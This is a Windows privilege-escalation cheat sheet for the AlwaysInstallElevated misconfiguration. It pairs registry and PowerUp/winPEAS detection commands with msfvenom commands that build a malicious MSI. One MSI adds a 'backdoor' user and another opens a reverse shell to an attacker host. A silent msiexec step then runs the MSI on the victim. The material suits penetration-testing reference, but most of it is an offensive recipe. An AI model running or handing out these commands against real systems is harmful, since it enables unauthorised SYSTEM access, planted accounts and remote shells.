AlwaysInstallElevated

AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions.

1. Detection

Check if these registry values are set to "1":

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer

Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer

With PowerSploit:

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"

[*] Checking for AlwaysInstallElevated registry key...

AbuseFunction : Write-UserAddMSI

With winPEAS:

winPEAS.exe

[+] Checking AlwaysInstallElevated(T1012)

AlwaysInstallElevated set to 1 in HKLM! AlwaysInstallElevated set to 1 in HKCU!

2. If they are, create your own malicious msi (Attacker machine):

msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi

msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi

msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={PORT} -a x64 --platform windows -f msi -o evil.msi

3. Then use msiexec on victim to execute your msi (Victim machine):

msiexec /quiet /qn /i C:\evil.msi

4. Technique also available in:

• Metasploit : exploit/windows/local/always_install_elevated

• PowerUp.ps1 : Get-RegistryAlwaysInstallElevated, Write-UserAddMSI